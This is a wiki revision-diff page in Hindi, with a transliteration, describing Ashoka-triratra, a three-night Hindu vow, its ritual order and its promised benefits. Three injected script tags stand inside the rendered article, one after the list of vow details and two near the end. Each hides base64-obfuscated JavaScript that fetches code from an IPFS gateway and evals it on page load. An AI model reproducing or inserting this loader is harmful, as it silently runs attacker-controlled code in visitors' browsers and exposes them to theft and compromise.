Difference between revisions of "अशोकत्रिरात्र"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==संबंधित लिंक==" to "==सम्बंधित लिंक==")
 
(4 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*यह व्रत [[ज्येष्ठ]], [[भाद्रपद]] या [[मार्गशीर्ष]] [[शुक्ल पक्ष]] की [[त्रयोदशी]] से तीन रातों तक किया जाता है।  
 
*यह व्रत [[ज्येष्ठ]], [[भाद्रपद]] या [[मार्गशीर्ष]] [[शुक्ल पक्ष]] की [[त्रयोदशी]] से तीन रातों तक किया जाता है।  
*इस व्रत के दिन चाँदी के अशोक वृक्ष, [[ब्रह्मा]] एवं [[सावित्री]] की मूर्तियों की पूजा करनी चाहिए।
+
*इस व्रत के दिन चाँदी के [[अशोक वृक्ष]], [[ब्रह्मा]] एवं [[सावित्री]] की मूर्तियों की पूजा करनी चाहिए।
 
*व्रत के दूसरे दिन [[उमा]] एवं [[महेश्वर]] की तथा तीसरे दिन [[लक्ष्मी]] एवं [[नारायण]] की पूजा और उसके उपरान्त मूर्तियों का दान करना चाहिए।  
 
*व्रत के दूसरे दिन [[उमा]] एवं [[महेश्वर]] की तथा तीसरे दिन [[लक्ष्मी]] एवं [[नारायण]] की पूजा और उसके उपरान्त मूर्तियों का दान करना चाहिए।  
 
*यह व्रत पापों को काटता है, रोगों का नाश करता है तथा पुत्रों एवं पौत्रों को लम्बी आयु, यश, सम्पत्ति एवं समृद्धि प्रदान करता है।<ref>हेमाद्रि व्रतखण्ड (2, 279-283); व्यवहार प्रकाश, व्रतार्क</ref>  
 
*यह व्रत पापों को काटता है, रोगों का नाश करता है तथा पुत्रों एवं पौत्रों को लम्बी आयु, यश, सम्पत्ति एवं समृद्धि प्रदान करता है।<ref>हेमाद्रि व्रतखण्ड (2, 279-283); व्यवहार प्रकाश, व्रतार्क</ref>  
 
*यह व्रत अधिकांशतः नारियों के द्वारा किया जाता है।  
 
*यह व्रत अधिकांशतः नारियों के द्वारा किया जाता है।  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 11:52, 10 April 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat jyeshth, bhadrapad ya margashirsh shukl paksh ki trayodashi se tin ratoan tak kiya jata hai.
  • is vrat ke din chaandi ke ashok vriksh, brahma evan savitri ki moortiyoan ki pooja karani chahie.
  • vrat ke doosare din uma evan maheshvar ki tatha tisare din lakshmi evan narayan ki pooja aur usake uparant moortiyoan ka dan karana chahie.
  • yah vrat papoan ko katata hai, rogoan ka nash karata hai tatha putroan evan pautroan ko lambi ayu, yash, sampatti evan samriddhi pradan karata hai.[1]
  • yah vrat adhikaanshatah nariyoan ke dvara kiya jata hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri vratakhand (2, 279-283); vyavahar prakash, vratark

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>